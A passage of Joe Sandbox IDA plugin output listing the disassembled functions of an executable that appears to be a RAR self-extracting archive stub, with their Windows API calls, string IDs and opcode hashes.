                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001FE630
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: b4b9a8166fa54d70acc30bed94fa349fbf3e60d70305286cf00dc5b0dddf39d2
                                                            • Instruction ID: 78d3bb704b73d84cc62b7c2aaf53a4254c04d4a39d743218ac712765c55d43f2
                                                            • Opcode Fuzzy Hash: b4b9a8166fa54d70acc30bed94fa349fbf3e60d70305286cf00dc5b0dddf39d2
                                                            • Instruction Fuzzy Hash: 9DF0F67179072E9B0F218F64ACC85B633CA6A7A771B01447ADB05D7130EF14CCA05B91
                                                            APIs
                                                            • _free.LIBCMT ref: 0020891E
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 00208930
                                                            • _free.LIBCMT ref: 00208943
                                                            • _free.LIBCMT ref: 00208954
                                                            • _free.LIBCMT ref: 00208965
                                                            Strings
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID: p!
                                                            • API String ID: 776569668-1659649850
                                                            • Opcode ID: 2dc5bfc3a827ca074eb5379dacd3499afa1528493db06dbcccab573190543361
                                                            • Instruction ID: 0d91e11bf2e3399a776de3cde85d30f655d98b17fc28459f942885b1cf7168eb
                                                            • Opcode Fuzzy Hash: 2dc5bfc3a827ca074eb5379dacd3499afa1528493db06dbcccab573190543361
                                                            • Instruction Fuzzy Hash: F6F03A79830227CBCB06AF26FC0A4463FA5F7367203820706FA58522F2CF7149659F81
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F14C2
                                                              • Part of subcall function 001EB146: GetVersionExW.KERNEL32(?), ref: 001EB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001F14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001F1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001F1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1533
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 2e1b7b41a4b1785eba9300fcc9d9011d5a4ae29e452520a7e67b0adcc43b6b72
                                                            • Instruction ID: 76eb683ba273c9f0379bbbfc449c7223681a391609d1f04c38db3695b0ed41d9
                                                            • Opcode Fuzzy Hash: 2e1b7b41a4b1785eba9300fcc9d9011d5a4ae29e452520a7e67b0adcc43b6b72
                                                            • Instruction Fuzzy Hash: 5D31E875108345ABC704DFA8D88499BBBF8BF98754F008A1EF999D3210E730D549CBA6
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00202AF1,002002FC,001FFA34), ref: 00202B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00202B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00202B2F
                                                            • SetLastError.KERNEL32(00000000,00202AF1,002002FC,001FFA34), ref: 00202B81
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 282675ad84da3b18e7dab343574345409043762ca4704bf9e18f0fd6abb7ef30
                                                            • Instruction ID: 9761af949dc26a3abf4d06ba72697e28bf6a869f296c39347c90bd7f5c17409e
                                                            • Opcode Fuzzy Hash: 282675ad84da3b18e7dab343574345409043762ca4704bf9e18f0fd6abb7ef30
                                                            • Instruction Fuzzy Hash: E601F532138312ADEB152E747C8DB5A3B49FB217B8720433BF510500E3EE224C259500
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00221098,00204674,00221098,?,?,002040EF,?,?,00221098), ref: 002097E9
                                                            • _free.LIBCMT ref: 0020981C
                                                            • _free.LIBCMT ref: 00209844
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 00209851
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 0020985D
                                                            • _abort.LIBCMT ref: 00209863
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 23eb4fdd91a3f5aea604bd39d9a943c04263355ef25687ce3e9234a990dc816e
                                                            • Instruction ID: f7385d134629e8c30f638f8850875a69a63324e8c35f313ccb9bbd300bbd2916
                                                            • Opcode Fuzzy Hash: 23eb4fdd91a3f5aea604bd39d9a943c04263355ef25687ce3e9234a990dc816e
                                                            • Instruction Fuzzy Hash: 1AF02D3517070267C7127734BC0DA5B1A6A8FE2770F218234FA5A923D3EE3088724915
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001FDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FDC72
                                                            • TranslateMessage.USER32(?), ref: 001FDC7C
                                                            • DispatchMessageW.USER32(?), ref: 001FDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 001FDC91
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: f07f2e72eccb705886d351a89c10b6daac84c4be1a46d89da2b553ac60ab6e91
                                                            • Instruction ID: a286b71be2871e93da868b7ecf2a977fee91e561a38ea40ac1539855731a49fa
                                                            • Opcode Fuzzy Hash: f07f2e72eccb705886d351a89c10b6daac84c4be1a46d89da2b553ac60ab6e91
                                                            • Instruction Fuzzy Hash: B9F03C72A01219BBCB20ABA5FC4CDEF7FBEEF56791B104121F60AD2050D6758646C7A0
                                                            APIs
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                              • Part of subcall function 001EB92D: _wcsrchr.LIBVCRUNTIME ref: 001EB944
                                                            • _wcslen.LIBCMT ref: 001EC197
                                                            • _wcslen.LIBCMT ref: 001EC1DF
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 985c6d8757065f6d0d63b89fc283c80d05ccd62506b0c23888b7d6d75e69e50b
                                                            • Instruction ID: 409a861ad434cea9ea1b9f220db5cb0de7727f2ef37f39c60d7603207d24f04a
                                                            • Opcode Fuzzy Hash: 985c6d8757065f6d0d63b89fc283c80d05ccd62506b0c23888b7d6d75e69e50b
                                                            • Instruction Fuzzy Hash: 55411525500BD6D5C736AF658C52ABEB3A8EF55B54F14090EF9816B182EB604DC3C3D1
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001EBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,001EA275,?,?,00000800,?,001EA23A,?,001E755C), ref: 001EBBC5
                                                            • _wcslen.LIBCMT ref: 001EBC3B
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: e2b5ee423adb1ea6131abc4a8eff5a12093c6598f48c17c6d1de1ecb4b1650da
                                                            • Instruction ID: e6bc71a6021aba1a25c46f4649d9592fde6cd8e4d60dff36207fc7a9a31601f8
                                                            • Opcode Fuzzy Hash: e2b5ee423adb1ea6131abc4a8eff5a12093c6598f48c17c6d1de1ecb4b1650da
                                                            • Instruction Fuzzy Hash: 1F41F731408699A6CF21AF61CC81EEFB7B9AF55354F244026F554B3151DBB0EE90CB50
                                                            APIs
                                                            • _wcschr.LIBVCRUNTIME ref: 001FCD84
                                                              • Part of subcall function 001FAF98: _wcschr.LIBVCRUNTIME ref: 001FB033
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr$CompareString
                                                            • String ID: <$HIDE$MAX$MIN
                                                            • API String ID: 69343711-3358265660
                                                            • Opcode ID: 2b500b02f3585ca05e235844eabaaa4a4f3073c807e0518ae6c6f1b5e3dbba12
                                                            • Instruction ID: 688b7a731b04f79ae847f26a44dfe88e5d89381b7e45902fec89a14f1cbf9555
                                                            • Opcode Fuzzy Hash: 2b500b02f3585ca05e235844eabaaa4a4f3073c807e0518ae6c6f1b5e3dbba12
                                                            • Instruction Fuzzy Hash: C131817290021DAADF25DB60DC45EFE77BDFB25350F4041A6EA05E7180EBB09E848FA1
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001EB9B8
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • _wcschr.LIBVCRUNTIME ref: 001EB9D6
                                                            • _wcschr.LIBVCRUNTIME ref: 001EB9E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 525462905-3142399695
                                                            • Opcode ID: 7479f2caf004a9a5cfd6bc818b1d316b8530b492811909a6299ea1589e34864d
                                                            • Instruction ID: 67c0e6054e185280a5b5de7c40674bd4b2d2c5d758e4aa0e180e2ec446911fba
                                                            • Opcode Fuzzy Hash: 7479f2caf004a9a5cfd6bc818b1d316b8530b492811909a6299ea1589e34864d
                                                            • Instruction Fuzzy Hash: 6F0145A3118B5169DB35AB768CC6D6FA3ECEED13B0B50441AF544D3083EB20D86482B1
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001FB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 001FB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1$xz#
                                                            • API String ID: 445417207-2979902089
                                                            • Opcode ID: 848515701745a9e9df1b02b2e27b4e4071bcca68108f61cf2960423adb91266c
                                                            • Instruction ID: 8224af003fbea8131bd01373d27d5ecc40c02f4ed13df4d8f83ae7e5a22fac14
                                                            • Opcode Fuzzy Hash: 848515701745a9e9df1b02b2e27b4e4071bcca68108f61cf2960423adb91266c
                                                            • Instruction Fuzzy Hash: 3011C432A4411CB6DB229AA4EC89FFF376CFF5A750F140020FB49B20C0D7A0AA559761
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 001FB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 001FB712
                                                            • DeleteObject.GDI32(00000000), ref: 001FB744
                                                            • DeleteObject.GDI32(00000000), ref: 001FB767
                                                              • Part of subcall function 001FA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001FB73D,00000066), ref: 001FA6D5
                                                              • Part of subcall function 001FA6C2: SizeofResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA6EC
                                                              • Part of subcall function 001FA6C2: LoadResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA703
                                                              • Part of subcall function 001FA6C2: LockResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA712
                                                              • Part of subcall function 001FA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001FB73D,00000066), ref: 001FA72D
                                                              • Part of subcall function 001FA6C2: GlobalLock.KERNEL32(00000000), ref: 001FA73E
                                                              • Part of subcall function 001FA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001FA762
                                                              • Part of subcall function 001FA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001FA7A7
                                                              • Part of subcall function 001FA6C2: GlobalUnlock.KERNEL32(00000000), ref: 001FA7C6
                                                              • Part of subcall function 001FA6C2: GlobalFree.KERNEL32(00000000), ref: 001FA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: 3288355122d43ce4106402ef0089230730e492b08ed58fb13e09d398af81efde
                                                            • Instruction ID: 0193fbe1cb11ee0da934af0bcc5ea6750d7afef3e53eda2bfcace0791a42bb3b
                                                            • Opcode Fuzzy Hash: 3288355122d43ce4106402ef0089230730e492b08ed58fb13e09d398af81efde
                                                            • Instruction Fuzzy Hash: C201663A900109A7C712B7749C4DA7F7AB99FC1762F140211FB04A3291DF258D054261
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FD64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001FD661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 001FD675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 001FD684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: 165dfc55fca2014cd73951619b3bfa13653be1484036c30c45a0e09245f315cf
                                                            • Instruction ID: 7418c22cdd41213d49d4bf6470e54c88ff5f1c9934bef833c1a9d009da7cb0dc
                                                            • Opcode Fuzzy Hash: 165dfc55fca2014cd73951619b3bfa13653be1484036c30c45a0e09245f315cf
                                                            • Instruction Fuzzy Hash: 7901D873685218BAD211DF64BE0DFBB775EEBABB21F110511F305E60D0C7A299048775
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00207E24,?,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002), ref: 00207E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00207EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00207E24,?,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002,00000000), ref: 00207EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 854ec6a41bc34eddbf2f2e027b1e953902e0d5eefe673a1f2fe9813bcd56b30c
                                                            • Instruction ID: 0c64c6dcda3edb27f2a7b389def4e1d3ddcbce4924e47ce20c11cfd97a25cd5e
                                                            • Opcode Fuzzy Hash: 854ec6a41bc34eddbf2f2e027b1e953902e0d5eefe673a1f2fe9813bcd56b30c
                                                            • Instruction Fuzzy Hash: FEF04431A11209BBDB11DFA0EC0DBDEBFB5EF54711F0480A9F805A2191DF749E51CA90
                                                            APIs
                                                              • Part of subcall function 001F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                              • Part of subcall function 001F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001EF2E4
                                                            • GetProcAddress.KERNEL32(002281C8,CryptUnprotectMemory), ref: 001EF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 342a99bb921bee5b73ca93367a613bfb25f332e77fee6ef964313dd2b45cb012
                                                            • Instruction ID: 76d80a434c8221db77fd5892c851c4e70452bc6b271bb7bf5d869740f6fc25a0
                                                            • Opcode Fuzzy Hash: 342a99bb921bee5b73ca93367a613bfb25f332e77fee6ef964313dd2b45cb012
                                                            • Instruction Fuzzy Hash: 07E02C30820B42AECB20DF39A80CB82BED66F39700F00C82DF0CAA3240CBB0D0C08B00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: 325f14264928d1255b07399f06904960e5e2a9d04c53ebaf0a3d322cbdd7e41a
                                                            • Instruction ID: 4d7ccceb4a590a20903bd99ad8ba0a61f1e4792cf105d467bdfdca213bc5fa89
                                                            • Opcode Fuzzy Hash: 325f14264928d1255b07399f06904960e5e2a9d04c53ebaf0a3d322cbdd7e41a
                                                            • Instruction Fuzzy Hash: 6851A071520312EFEB298F14D889BAA77A4FF54310F24452BEC05476E2D771ADA8DB90
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0020BF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020BF5C
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0020BF82
                                                            • _free.LIBCMT ref: 0020BF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0020BFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 0cb7a92bfabb3c5b35aae0c339394e12cd385ef10fa6e42b1c7700da536035b6
                                                            • Instruction ID: fb5e11e1c54fa74c5b8bbf8def6919a94a3efe84209745fa3f00c4bab922bf81
                                                            • Opcode Fuzzy Hash: 0cb7a92bfabb3c5b35aae0c339394e12cd385ef10fa6e42b1c7700da536035b6
                                                            • Instruction Fuzzy Hash: A801F7726213137FA7325A766C4CCBB6A6DDEC6BA03144129FD08C3282EF60CD1189B0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,002091AD,0020B188,?,00209813,00000001,00000364,?,002040EF,?,?,00221098), ref: 0020986E
                                                            • _free.LIBCMT ref: 002098A3
                                                            • _free.LIBCMT ref: 002098CA
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 002098D7
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 002098E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            APIs
                                                              • Part of subcall function 001F11CF: ResetEvent.KERNEL32(?), ref: 001F11E1
                                                              • Part of subcall function 001F11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001F11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001F0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 001F0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 001F0F54
                                                            • CloseHandle.KERNEL32(?), ref: 001F0F60
                                                            • CloseHandle.KERNEL32(?), ref: 001F0F6C
                                                              • Part of subcall function 001F0FE4: WaitForSingleObject.KERNEL32(?,000000FF,001F1101,?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FEA
                                                              • Part of subcall function 001F0FE4: GetLastError.KERNEL32(?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FF6
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            APIs
                                                            • _free.LIBCMT ref: 0020C817
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 0020C829
                                                            • _free.LIBCMT ref: 0020C83B
